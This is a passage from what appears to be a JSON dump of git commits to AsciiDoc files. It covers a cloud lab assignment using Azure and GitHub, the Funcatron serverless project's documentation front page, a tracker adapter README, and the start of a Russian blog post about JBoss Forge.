\n\n. Form 3 teams.\n\n. Each team member: Get a free student account for Azure. (Not sure if there is an approval cycle.) Do NOT give them a credit card. \n\n. Spin up a VM and access it there. \n\n. Get some software (any of the things we worked on last week) running on it in a way that others can view (preferably a simple curl that returns a string or a number).\n\n. Put that software into version control, in the aitm-labs\/svc* repo as appropriate. I control those repos? How do you do this using GitHub?\n\n. Explore the Microsoft work management \/ Kanban capabilities. Connect them to Github pull requests. Update your software and ensure that the person making the changes does not push to master, but instead issues a pull request of a team mate (basic peer review).\n\n. Connect Azure pipelines with GitHub so that you can automatically deploy on commit from Github. \n\n\n\n\n","old_contents":"= Tech lab 04 (version 3)\n\n== Overall goal \n\nTrack, with Github, Microsoft Azure and possibly ServiceNow, the course material on a technical level.\n\n== Section II priorities: it's all about the team. \n\n. Recommended editor: VSCode\n\n. Form 3 teams.\n\n. Each team member: Get a free student account for Azure. (Not sure if there is an approval cycle.) Do NOT give them a credit card. \n\n. Spin up a VM and access it there. \n\n. Get some software (any of the things we worked on last week) running on it in a way that others can view (preferably a simple curl that returns a string or a number).\n\n. Put that software into version control, in the aitm-labs\/svc* repo as appropriate. I control those repos? How do you do this using GitHub?\n\n. Explore the Microsoft work management \/ Kanban capabilities. Connect them to Github pull requests. Update your software and ensure that the person making the changes does not push to master, but instead issues a pull request of a team mate (basic peer review).\n\n. Connect Azure pipelines with GitHub so that you can automatically deploy on commit from Github. \n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"86aa24924c9ee6a01e5bd96a5ca0f07b61fdb107","subject":"QUick starts above fold","message":"QUick starts above fold\n","repos":"funcatron\/funcatron,funcatron\/funcatron,funcatron\/funcatron,funcatron\/funcatron","old_file":"doc_o_matic\/front_master.adoc","new_file":"doc_o_matic\/front_master.adoc","new_contents":"= Funcatron\n:toc:\n\n== Quick Starts\n\nlink:\/master\/funcatron\/info\/spring_boot.html[Spring Boot Quickstart].\n\nlink:\/master\/funcatron\/info\/dev_intro.html[Lambda-style Quickstart].\n\n== About\n\n\nServerless on Your Cluster:\n\n* Define Endpoints in Swagger\n* Write Functions in Java, Scala, Clojure, Python, or JavaScript\n* Deploy to Mesos, Kubernets, or Swarm\n* Autoscale\n\n_Funcatron let's you deploy serverless on any cloud provider or in your\nprivate cloud. Focus on the functions, avoid vendor lock-in._\n\nThis document sets out the goals for the http:\/\/funcatron.org[Funcatron] project.\n\n### Getting Started w\/Spring Boot\n\nIf you've already got a https:\/\/spring.io\/guides\/gs\/spring-boot\/[Spring Boot]\napp and you want to run it in Funcatron... you're in luck. Add a few dependencies\nand 2 classes to your existing Spring Boot app and you're good to go.\nThe link:\/master\/funcatron\/info\/spring_boot.html[Spring Boot Quickstart]\ngets you started... quickly.\n\nAnd check out the link:\/master\/funcatron\/info\/architecture_strategy.html[Architecture\nStrategy] for a deeper dive into Funcatron.\n\n### Getting Started Lambda-style\n\n\"`Lambdas`\" are small units of computing... Funcations. Funcatron\nsupports writing small funcations, associating them with REST endpoints,\nand autoscaling. The\nlink:\/master\/funcatron\/info\/dev_intro.html[Developer Intro] to\nFuncatron walks you through building Funcatron bundles Lambda-style.\n\nAnd check out the link:\/master\/funcatron\/info\/architecture_strategy.html[Architecture\nStrategy] for a deeper dive into Funcatron.\n\n\n### What's Funcatron\n\nAmazon's https:\/\/aws.amazon.com\/lambda\/[Lambda] popularized\nhttp:\/\/www.martinfowler.com\/articles\/serverless.html[\"`serverless`\"]\ncode deployment. It's dead simple: associate a \"`function`\" with an event.\nEach time the event happens, the function is applied and the function's\nreturn value is returned to the event source. An event could be an HTTP(S)\nrequest, something on an event queue, whatever.\n\nFunctions are ephemeral. They exist for the duration of the function call.\nOnce the function returns a value, all of its state and scope and everything\nelse about it is assumed to go away.\n\nScaling this kind of architecture is simple: the more frequently a function gets\napplied, the more compute resources are allocated to support the function...\nand https:\/\/en.wikipedia.org\/wiki\/Bob%27s_your_uncle[Bob's Your Uncle].\n\nThe current popular function runners (competitors to Amazon's Lambda), however, are\nproprietary: when you write to the API for Lambda or Google's\nhttps:\/\/cloud.google.com\/functions\/docs\/[Cloud Functions],\n_**you're locked into that vendor**_.\n\nThere's currently no (well, there's https:\/\/developer.ibm.com\/openwhisk\/[OpenWhisk])\ngeneric way to do the auto-scale function thing on a private cloud or in a\nway that can migrate from one cloud provider to another.\n\nFuncatron addresses this. Funcatron is a cloud-provider-neutral mechanism for\ndeveloping, testing, and deploying auto-scalable functions.\n\nFuncatron is designed to run on container orchestration clusters:\nhttps:\/\/mesosphere.com\/[Mesos], http:\/\/kubernetes.io\/[Kubernetes], or\nhttps:\/\/docker.com[Docker Swarm].\n\n### Software Lifecycle\n\nSoftware goes through a lifecycle:\n\n- Authoring\n- Testing\n- Staging\n- Production\n- Debugging\n\nFuncatron addresses software at each stage of the lifecycle.\n\n#### Authoring\n\nAn engineers sits down to write software. The faster the turn-around between\ncode written and \"`trying it out,`\" the more productive the engineer will be.\n\nFuncatron supports a \"`save, reload`\" model where the engineer saves a file\n(presuming they're using an IDE that does compilation on save or are using a\nnon-compiled language), and their function endpoints are available. That's it.\nNo uploading. No reconfiguration. No waiting. The endpoint is available on save.\n\nFurther, the Funcatron model requires knowledge of two things:\n\n* http:\/\/swagger.io[Swagger]\n* How to write a simple function in Java, Scala, Clojure, Python, or JavaScript.\n\n**That's it.**\n\nThe engineer defines the endpoints in Swagger and uses the `operationId` to\nspecify the function (or class for Java and Scala) to apply when then endpoint\nis requested. Funcatron takes care of the rest.\n\nBetween the fast turn-around and low \"`new stuff to learn`\" quotient,\nit's easy to get started with Funcatron. It's also easy to stay productive\nwith Funcatron.\n\nAlso, developers need only have Docker installed on their development machine\nto live-test Funcatron code.\n\n#### Testing\n\nBecause Funcatron endpoints are single functions (or methods on newly\ninstantiated classes), writing unit tests is simple. Write a unit test and\ntest the function.\n\n#### Staging\n\nFuncatron code bundles (Funcs) contain a Swagger endpoint definition and the\nfunctions\nthat are associated with the endpoint and any library code. For JVM languages,\nthese are bundled into an Uber JAR. For Python, a\nhttps:\/\/github.com\/pantsbuild\/pex[PEX]\nfile. The Swagger definitions for an endpoint are unique based on\nhost name and root path.\n\nFuncatron supports aliasing Swagger fields and values in different\nenvironments such that a single Swagger definition can be run\nin staging and testing environments without change.\nThus, there's one deployment unit (a Func bundle) that have well defined\nbehaviors across test, staging, and production servers.\n\n#### Production\n\nFuncatron allows simple deployment and undeployment of end-point collections\ndefined in Swagger files and implemented in a JVM language, Python, or NodeJS.\n\nRequests are forwarded from Nginx via a message queue to a dispatcher (a Tron).\nBased on the hostname and root path, the message is placed on a queue for\na specific Func. The Func processes the request and sends the response\nto a reply queue. The Nginx process dequeues the response and returns\nit as an HTTP response.\n\nThe number of Func instances running on a cluster is based on the queue depth\nand response time. The Func manager sends statistics back to the Trons\nand the Trons change Func allocation based on these statistics by\ncommunicating with the container orchestration substrate (Mesos, Kubernetes,\nSwarm) and changing the allocation of Func running containers.\n\nFrom the DevOps point of view: deploy a Func and it binds to the appropriate\nHTTP endpoint and scales to handle load.\n\n#### Debugging & Test Cases\n\nFuncatron logs a unique request ID and the SHA of the Func with every log line\nrelated to a request. This allows correlation of requests as they fan out through\na cluster.\n\nFuncatron allows dynamic changing log levels on a Func-by-Func basis which allows\ncapturing more information on demand.\n\nAll communications between the front end, Funcs, and back again are via well\ndefined JSON payloads. Funcatron allows capturing request and response\npayloads on a Func-by-Func basis (complete streams, or random sampling).\nThis data can be used for testing or debugging.\n\n### Architecture\n\nFuncatron has some ambitious goals... and has an architecture to facilitate\nachieving these goals.\n\nIn all but development mode, Funcatron runs on a Docker container orchestration\nsystem: Mesos, Kubernetes, or Docker Swarm. We call this the \"container\nsubstrate.\" Each of the Funcatron components can be scaled independently with\nmessages to the container substrate.\n\nFor HTTP requests, Funcatron uses Nginx and Lua (via the\nhttp:\/\/openresty.org\/en\/[OpenResty] project) to handle the HTTP requests.\nA small\nLua script encodes the request as a payload that's sent to a message broker\n(initially RabbitMQ, but this will be pluggable, e.g. Kafka, Redis). For large\nrequest or response bodies, there will be a direct connection between the Front End\nand the Runner.\nFor all but the highest volume installations, 2 Nginx instances\nshould be sufficient.\n\nBased on the combination of `host` and `pathPrefix` attributes in the Swagger\nmodule definition, the Tron enqueues the request on the appropriate queue.\n\nA Runner module dequeues messages from a number of host\/pathPrefix queues and\nforwards the request to the appropriate Func. The runner then takes the function\nreturn value and appropriately encodes it and places it on the reply queue which\ndequeued by the original endpoint.\n\nEach Func can run multiple modules. Based on queue depth, queue service time,\nand CPU usage stats from the Funcs, more runners can be allocated on the substrate,\nor more Funcs can be allocated across the runners.\n\nThe Lua scripts dequeues the response and turns in into an Nginx response.\n\nBecause all of the operation of the Funcs and Trons can be captured as messages\n(and all the messages are in JSON), it's possible to capture message streams for\ntesting and debugging purposes.\n\nEvery request has a unique ID and each log line includes the unique ID so it's\npossible to correlate a request as it moves across the cluster.\n\n[plantuml]\n----\nskinparam handwritten true\n\n\n() \"Upload\/Enable\" as Operator\n\n() \"HTTPS Proxy\" as Proxy\n\nnode \"Message Queue\" as MQ\n\npackage \"Public Facing\" {\n [Frontend]\n}\n\nnode {\n [Tron]\n [Runner]\n}\n\n\nProxy -> [Frontend] : \"HTTP port 80\"\n\n[Frontend] <--> MQ : Stomp\n\n[Tron] <--> MQ : AMQP\n\nNote left of [Frontend]: Multiple instances\n\n[Frontend] -> [Runner] : \"HTTP port 4000\"\n\n[Runner] -> [Tron] : \"HTTP port 3000\"\n\nNote left of [Runner] : Multiple instances\\nAuto-scaled\n\nNote left of [Tron] : One instance\n\nNote left of MQ : Cluster\n\nNote left of Operator : Access to control\\nFuncatron cluster\n\n\n[Runner] <--> MQ : AMQP\n\nOperator -> [Tron] : \"HTTP port 3000\"\n----\n\n#### Notes\n\nThe initial implementation uses Nginx\/OpenResty, RabbitMQ, Java\/Scala, and Mesos\nto support HTTP requests. This is not \"`hardcoded`\" but pluggable. Specifically:\n\n* Anything that can enqueue a payload and dequeue the response can\n work with the rest of Funcatron. The initial implementation is HTTP via\n Nginx\/OpenResty, but nothing in the rest of the system depends on what enqueues\n the request and dequeues the response.\n* RabbitMQ is the initial message broker, but it could be Kafka, Redis, or any other\n message broker. This is pluggable.\n* Initially, dispatch from Runners to Funcs will be Java\/Scala\/Kotlin classes. But the\n dispatch is also pluggable so other languages (Clojure) and\n runtimes (Python, NodeJS, Ruby\/Rails) will be supported.\n* \"`But Swagger is HTTP only`\" well... yes and no... the verb and the scheme are\n HTTP-specific, but they can be ignored... and by the time the request is\n dequeued by the Runner, the origin (HTTP or something else) of the message\n is irrelevant. The power of Swagger is two-fold:\n ** Excellent definitions of incoming and outgoing data shapes\n ** Great tooling and lots of general Swagger skills\n\nBecause everything in Funcatron is asynchronous messages, how the messages are\npassed, where the message originate and where responses are dequeued are all\npluggable and irrelevant to the other parts of the system.\n\nThe key idea in Funcatron is the Func is a well defined bundle of functionality\nthat's associated with a particular message signature that maps to well HTTP via\nhost, pathPrefix, path, and verb, but could map to something else.\n\nIt may be possible to chain Func invocations. I don't yet have a concrete\ndesign, but rather than enqueuing a Func return value as a response, it may\nbe possible to package it as a request (the request body contains the Func\nreturn value) and forwarding it to another Func for further processing.\n\nFinally, if there's no `reply-to` field in a message, the Func is applied (invoked)\nbut the results are discarded. This allows for side effects from the Func\nrather than just computation.\n\n\n### Contributing\n\nPlease see https:\/\/github.com\/funcatron\/tron\/blob\/master\/CONTRIBUTING.md[CONTRIBUTING] for details on\nhow to make a contribution.\n\n### Licenses and Support\n\nFuncatron is licensed under an Apache 2 license.\n\nSupport is available from the project's founder,\n[David Pollak](mailto:feeder.of.the.bears@gmail.com).\n\n\n== Documentation Versions\n\n$$VERSIONLIST$$\n\n","old_contents":"= Funcatron\n:toc:\n\n== About\n\nServerless on Your Cluster:\n\n* Define Endpoints in Swagger\n* Write Functions in Java, Scala, Clojure, Python, or JavaScript\n* Deploy to Mesos, Kubernets, or Swarm\n* Autoscale\n\n_Funcatron let's you deploy serverless on any cloud provider or in your\nprivate cloud. Focus on the functions, avoid vendor lock-in._\n\nThis document sets out the goals for the http:\/\/funcatron.org[Funcatron] project.\n\n### Getting Started w\/Spring Boot\n\nIf you've already got a https:\/\/spring.io\/guides\/gs\/spring-boot\/[Spring Boot]\napp and you want to run it in Funcatron... you're in luck. Add a few dependencies\nand 2 classes to your existing Spring Boot app and you're good to go.\nThe link:\/master\/funcatron\/info\/spring_boot.html[Spring Boot Quickstart]\ngets you started... quickly.\n\nAnd check out the link:\/master\/funcatron\/info\/architecture_strategy.html[Architecture\nStrategy] for a deeper dive into Funcatron.\n\n### Getting Started Lambda-style\n\n\"`Lambdas`\" are small units of computing... Funcations. Funcatron\nsupports writing small funcations, associating them with REST endpoints,\nand autoscaling. The\nlink:\/master\/funcatron\/info\/dev_intro.html[Developer Intro] to\nFuncatron walks you through building Funcatron bundles Lambda-style.\n\nAnd check out the link:\/master\/funcatron\/info\/architecture_strategy.html[Architecture\nStrategy] for a deeper dive into Funcatron.\n\n\n### What's Funcatron\n\nAmazon's https:\/\/aws.amazon.com\/lambda\/[Lambda] popularized\nhttp:\/\/www.martinfowler.com\/articles\/serverless.html[\"`serverless`\"]\ncode deployment. It's dead simple: associate a \"`function`\" with an event.\nEach time the event happens, the function is applied and the function's\nreturn value is returned to the event source. An event could be an HTTP(S)\nrequest, something on an event queue, whatever.\n\nFunctions are ephemeral. They exist for the duration of the function call.\nOnce the function returns a value, all of its state and scope and everything\nelse about it is assumed to go away.\n\nScaling this kind of architecture is simple: the more frequently a function gets\napplied, the more compute resources are allocated to support the function...\nand https:\/\/en.wikipedia.org\/wiki\/Bob%27s_your_uncle[Bob's Your Uncle].\n\nThe current popular function runners (competitors to Amazon's Lambda), however, are\nproprietary: when you write to the API for Lambda or Google's\nhttps:\/\/cloud.google.com\/functions\/docs\/[Cloud Functions],\n_**you're locked into that vendor**_.\n\nThere's currently no (well, there's https:\/\/developer.ibm.com\/openwhisk\/[OpenWhisk])\ngeneric way to do the auto-scale function thing on a private cloud or in a\nway that can migrate from one cloud provider to another.\n\nFuncatron addresses this. Funcatron is a cloud-provider-neutral mechanism for\ndeveloping, testing, and deploying auto-scalable functions.\n\nFuncatron is designed to run on container orchestration clusters:\nhttps:\/\/mesosphere.com\/[Mesos], http:\/\/kubernetes.io\/[Kubernetes], or\nhttps:\/\/docker.com[Docker Swarm].\n\n### Software Lifecycle\n\nSoftware goes through a lifecycle:\n\n- Authoring\n- Testing\n- Staging\n- Production\n- Debugging\n\nFuncatron addresses software at each stage of the lifecycle.\n\n#### Authoring\n\nAn engineers sits down to write software. The faster the turn-around between\ncode written and \"`trying it out,`\" the more productive the engineer will be.\n\nFuncatron supports a \"`save, reload`\" model where the engineer saves a file\n(presuming they're using an IDE that does compilation on save or are using a\nnon-compiled language), and their function endpoints are available. That's it.\nNo uploading. No reconfiguration. No waiting. The endpoint is available on save.\n\nFurther, the Funcatron model requires knowledge of two things:\n\n* http:\/\/swagger.io[Swagger]\n* How to write a simple function in Java, Scala, Clojure, Python, or JavaScript.\n\n**That's it.**\n\nThe engineer defines the endpoints in Swagger and uses the `operationId` to\nspecify the function (or class for Java and Scala) to apply when then endpoint\nis requested. Funcatron takes care of the rest.\n\nBetween the fast turn-around and low \"`new stuff to learn`\" quotient,\nit's easy to get started with Funcatron. It's also easy to stay productive\nwith Funcatron.\n\nAlso, developers need only have Docker installed on their development machine\nto live-test Funcatron code.\n\n#### Testing\n\nBecause Funcatron endpoints are single functions (or methods on newly\ninstantiated classes), writing unit tests is simple. Write a unit test and\ntest the function.\n\n#### Staging\n\nFuncatron code bundles (Funcs) contain a Swagger endpoint definition and the\nfunctions\nthat are associated with the endpoint and any library code. For JVM languages,\nthese are bundled into an Uber JAR. For Python, a\nhttps:\/\/github.com\/pantsbuild\/pex[PEX]\nfile. The Swagger definitions for an endpoint are unique based on\nhost name and root path.\n\nFuncatron supports aliasing Swagger fields and values in different\nenvironments such that a single Swagger definition can be run\nin staging and testing environments without change.\nThus, there's one deployment unit (a Func bundle) that have well defined\nbehaviors across test, staging, and production servers.\n\n#### Production\n\nFuncatron allows simple deployment and undeployment of end-point collections\ndefined in Swagger files and implemented in a JVM language, Python, or NodeJS.\n\nRequests are forwarded from Nginx via a message queue to a dispatcher (a Tron).\nBased on the hostname and root path, the message is placed on a queue for\na specific Func. The Func processes the request and sends the response\nto a reply queue. The Nginx process dequeues the response and returns\nit as an HTTP response.\n\nThe number of Func instances running on a cluster is based on the queue depth\nand response time. The Func manager sends statistics back to the Trons\nand the Trons change Func allocation based on these statistics by\ncommunicating with the container orchestration substrate (Mesos, Kubernetes,\nSwarm) and changing the allocation of Func running containers.\n\nFrom the DevOps point of view: deploy a Func and it binds to the appropriate\nHTTP endpoint and scales to handle load.\n\n#### Debugging & Test Cases\n\nFuncatron logs a unique request ID and the SHA of the Func with every log line\nrelated to a request. This allows correlation of requests as they fan out through\na cluster.\n\nFuncatron allows dynamic changing log levels on a Func-by-Func basis which allows\ncapturing more information on demand.\n\nAll communications between the front end, Funcs, and back again are via well\ndefined JSON payloads. Funcatron allows capturing request and response\npayloads on a Func-by-Func basis (complete streams, or random sampling).\nThis data can be used for testing or debugging.\n\n### Architecture\n\nFuncatron has some ambitious goals... and has an architecture to facilitate\nachieving these goals.\n\nIn all but development mode, Funcatron runs on a Docker container orchestration\nsystem: Mesos, Kubernetes, or Docker Swarm. We call this the \"container\nsubstrate.\" Each of the Funcatron components can be scaled independently with\nmessages to the container substrate.\n\nFor HTTP requests, Funcatron uses Nginx and Lua (via the\nhttp:\/\/openresty.org\/en\/[OpenResty] project) to handle the HTTP requests.\nA small\nLua script encodes the request as a payload that's sent to a message broker\n(initially RabbitMQ, but this will be pluggable, e.g. Kafka, Redis). For large\nrequest or response bodies, there will be a direct connection between the Front End\nand the Runner.\nFor all but the highest volume installations, 2 Nginx instances\nshould be sufficient.\n\nBased on the combination of `host` and `pathPrefix` attributes in the Swagger\nmodule definition, the Tron enqueues the request on the appropriate queue.\n\nA Runner module dequeues messages from a number of host\/pathPrefix queues and\nforwards the request to the appropriate Func. The runner then takes the function\nreturn value and appropriately encodes it and places it on the reply queue which\ndequeued by the original endpoint.\n\nEach Func can run multiple modules. Based on queue depth, queue service time,\nand CPU usage stats from the Funcs, more runners can be allocated on the substrate,\nor more Funcs can be allocated across the runners.\n\nThe Lua scripts dequeues the response and turns in into an Nginx response.\n\nBecause all of the operation of the Funcs and Trons can be captured as messages\n(and all the messages are in JSON), it's possible to capture message streams for\ntesting and debugging purposes.\n\nEvery request has a unique ID and each log line includes the unique ID so it's\npossible to correlate a request as it moves across the cluster.\n\n[plantuml]\n----\nskinparam handwritten true\n\n\n() \"Upload\/Enable\" as Operator\n\n() \"HTTPS Proxy\" as Proxy\n\nnode \"Message Queue\" as MQ\n\npackage \"Public Facing\" {\n [Frontend]\n}\n\nnode {\n [Tron]\n [Runner]\n}\n\n\nProxy -> [Frontend] : \"HTTP port 80\"\n\n[Frontend] <--> MQ : Stomp\n\n[Tron] <--> MQ : AMQP\n\nNote left of [Frontend]: Multiple instances\n\n[Frontend] -> [Runner] : \"HTTP port 4000\"\n\n[Runner] -> [Tron] : \"HTTP port 3000\"\n\nNote left of [Runner] : Multiple instances\\nAuto-scaled\n\nNote left of [Tron] : One instance\n\nNote left of MQ : Cluster\n\nNote left of Operator : Access to control\\nFuncatron cluster\n\n\n[Runner] <--> MQ : AMQP\n\nOperator -> [Tron] : \"HTTP port 3000\"\n----\n\n#### Notes\n\nThe initial implementation uses Nginx\/OpenResty, RabbitMQ, Java\/Scala, and Mesos\nto support HTTP requests. This is not \"`hardcoded`\" but pluggable. Specifically:\n\n* Anything that can enqueue a payload and dequeue the response can\n work with the rest of Funcatron. The initial implementation is HTTP via\n Nginx\/OpenResty, but nothing in the rest of the system depends on what enqueues\n the request and dequeues the response.\n* RabbitMQ is the initial message broker, but it could be Kafka, Redis, or any other\n message broker. This is pluggable.\n* Initially, dispatch from Runners to Funcs will be Java\/Scala\/Kotlin classes. But the\n dispatch is also pluggable so other languages (Clojure) and\n runtimes (Python, NodeJS, Ruby\/Rails) will be supported.\n* \"`But Swagger is HTTP only`\" well... yes and no... the verb and the scheme are\n HTTP-specific, but they can be ignored... and by the time the request is\n dequeued by the Runner, the origin (HTTP or something else) of the message\n is irrelevant. The power of Swagger is two-fold:\n ** Excellent definitions of incoming and outgoing data shapes\n ** Great tooling and lots of general Swagger skills\n\nBecause everything in Funcatron is asynchronous messages, how the messages are\npassed, where the message originate and where responses are dequeued are all\npluggable and irrelevant to the other parts of the system.\n\nThe key idea in Funcatron is the Func is a well defined bundle of functionality\nthat's associated with a particular message signature that maps to well HTTP via\nhost, pathPrefix, path, and verb, but could map to something else.\n\nIt may be possible to chain Func invocations. I don't yet have a concrete\ndesign, but rather than enqueuing a Func return value as a response, it may\nbe possible to package it as a request (the request body contains the Func\nreturn value) and forwarding it to another Func for further processing.\n\nFinally, if there's no `reply-to` field in a message, the Func is applied (invoked)\nbut the results are discarded. This allows for side effects from the Func\nrather than just computation.\n\n\n### Contributing\n\nPlease see https:\/\/github.com\/funcatron\/tron\/blob\/master\/CONTRIBUTING.md[CONTRIBUTING] for details on\nhow to make a contribution.\n\n### Licenses and Support\n\nFuncatron is licensed under an Apache 2 license.\n\nSupport is available from the project's founder,\n[David Pollak](mailto:feeder.of.the.bears@gmail.com).\n\n\n== Documentation Versions\n\n$$VERSIONLIST$$\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"edc249669dae3ca4a1d6746df65db2ebdb4513a8","subject":"Fix documentation","message":"Fix documentation\n","repos":"qarea\/jirams,qarea\/jirams","old_file":"doc\/narada-base-tracker-adapter.adoc","new_file":"doc\/narada-base-tracker-adapter.adoc","new_contents":"= Narada tracker adapter base\n\nThis project based on https:\/\/gitlab.qarea.org\/tgms\/narada-tgms-base\/tree\/master\n\n== Additions\/changes to base project\n\n=== migrate\n\n* Add httptimeout configuration for requests to remote services\n\n=== entities package\n\n* Package provides required entities structure and needed errors for adapter\n\n=== api\/rpcsvc package\n\n* Implements all needed JSONRPC2 api calls and provide interface for adapter client\n\n=== MySQL\n\n* Removed all MySQL related files, if you need one - take it from narada-tgms-base\n","old_contents":"Narada tracker adapter base\n================\n\nThis project based on https:\/\/gitlab.qarea.org\/tgms\/narada-tgms-base\/tree\/master\n\n== Additions\/changes to base project\n\n=== migrate\n\n* Add httptimeout configuration for requests to remote services\n\n=== entities package\n\n* Package provides required entities structure and needed errors for adapter\n\n=== api\/rpcsvc package\n\n* Implements all needed JSONRPC2 api calls and provide interface for adapter client\n\n=== MySQL\n\n* Removed all MySQL related files, if you need one - take it from narada-tgms-base\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"db043cc6f782697c25b17fdd91d921ad7d3c5553","subject":"Update 2016-05-17-Kuznya-a-ved-udobno-JBoss-Forge-pretty-sweet.adoc","message":"Update 2016-05-17-Kuznya-a-ved-udobno-JBoss-Forge-pretty-sweet.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-17-Kuznya-a-ved-udobno-JBoss-Forge-pretty-sweet.adoc","new_file":"_posts\/2016-05-17-Kuznya-a-ved-udobno-JBoss-Forge-pretty-sweet.adoc","new_contents":"= \u041a\u0443\u0437\u043d\u044f, \u0430 \u0432\u0435\u0434\u044c \u0443\u0434\u043e\u0431\u043d\u043e { JBoss Forge, pretty sweet }\n:hp-tags: \u043f\u043e\u043b\u0435\u0437\u043d\u044f\u0448\u043a\u0438, \u0447\u0435\u0440\u043d\u043e\u0432\u0438\u043a\n\n\u041f\u0440\u043e\u0431\u0443\u044e \u043f\u043e \u043a\u043d\u0438\u0436\u043a\u0435 \u043f\u043e\u043a\u0430\u0447\u0430\u0442\u044c\u0441\u044f \u0434\u043e \u0431\u0435\u0441\u043f\u0440\u0435\u0440\u044b\u0432\u043d\u043e\u0439 \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438 http:\/\/bit.ly\/1XLMRZZ[Continuous Enterprise Development in Java _by Andrew Lee Rubinger, Aslak Knutsen_] . \u0418 \u0432\u043e\u0442 \u0442\u0430\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043a\u0443\u0437\u043d\u044f. \u0421\u0442\u043e\u043b\u044c\u043a\u043e \u0440\u0443\u0442\u0438\u043d\u044b \u0443\u0436\u0435 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043e. \u0412\u0435\u0434\u044c \u0443\u0434\u043e\u0431\u043d\u043e. \u041d\u0430\u0434\u043e \u043f\u043e\u043a\u043e\u043f\u0430\u0442\u044c \u0434\u0430\u043b\u044c\u0448\u0435. \u0422\u0443\u0442 \u0432\u0435\u0434\u044c \u0438 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0435 \u0443\u0434\u043e\u0431\u043d\u0435\u0435. \u041d\u0443 \u0442.\u0435. \u0440\u0430\u0441\u043f\u0438\u0441\u0430\u043d\u043e \u043a\u0430\u043a \u0441\u0434\u0435\u043b\u0430\u0442\u044c.\n\n*\u0427\u0442\u043e \u043f\u043e\u043d\u0440\u0430\u0432\u0438\u043b\u043e\u0441\u044c:*\n\n . \u041e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0448\u044c \u043f\u043e\u0447\u0442\u0438 \u0447\u0435\u043b\u043e\u0432\u0435\u0447\u0435\u0441\u043a\u0438\u043c \u044f\u0437\u044b\u043a\u043e\u043c\n . \u0418\u043d\u043a\u0440\u0435\u043c\u0435\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043f\u0440\u043e\u0435\u043a\u0442\u0430\n . \u0414\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0442\u043e\u043d\u043a\u0430\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\n . \u0412\u044b\u0431\u043e\u0440 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0439 \u0438\u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u043e\u0432\n . \u0425\u043e\u0440\u043e\u0448\u0430\u044f \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0430 \u043f\u043e <TAB>, \u043f\u043e \u043d\u0435\u0439 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0438 \u0443\u0447\u0443\u0441\u044c.\n . \u041f\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0443 \u0433\u0443\u043b\u044f\u0435\u0448\u044c \u043a\u0430\u043a \u043f\u043e \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u0442\u0435 \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0430 \u043a\u043e\u043c\u0430\u043d\u0434 \u0443\u0436\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442\u0441\u044f \u0437\u043d\u0430\u0435\u0448\u044c.\n\n*\u041d\u0435 \u043f\u043e\u043d\u0440\u0430\u0432\u0438\u043b\u043e\u0441\u044c:*\n_\u041f\u043e \u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0443\u0447\u0443\u0441\u044c \u043f\u043e \u043a\u043d\u0438\u0433\u0435, \u0442\u043e \u043a\u043d\u0438\u0433\u0430 \u0443\u0441\u0442\u0430\u0440\u0435\u043b\u0430. \u041d\u043e \u0438 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0441\u0430\u0439\u0442 \u0442\u043e\u0436\u0435 \u0443\u0441\u0442\u0430\u0440\u0435\u043b. \u041f\u0440\u0438\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0438\u0434\u0442\u0438 \u043f\u043e\u0447\u0442\u0438 \u0432 \u0441\u043b\u0435\u043f\u0443\u044e. \u0412 \u043a\u043d\u0438\u0433\u0435 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432\u0435\u0440\u0441\u0438\u044f 1 \u0438\u043b\u0438 2, \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 \u0432\u0435\u0440\u0441\u0438\u044f 3. \u0422\u043e \u0447\u0442\u043e \u0441\u043a\u0430\u0447\u0430\u043b\u043e\u0441\u044c jboss IDE \u0442\u0430\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f 3.0.1 \u043a\u0430\u0436\u0435\u0442\u0441\u044f. \u0418 \u043e\u043d\u043e \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u043e\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 3, \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0442 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u0432\u043e\u0439\u0441\u0442\u0432\u0430._\n \n . \u0425\u043e\u0442\u044c \u044f \u0438 \u0432\u044b\u0431\u0440\u0430\u043b scaffolding faces 2.2, \u043a\u043e\u0433\u0434\u0430 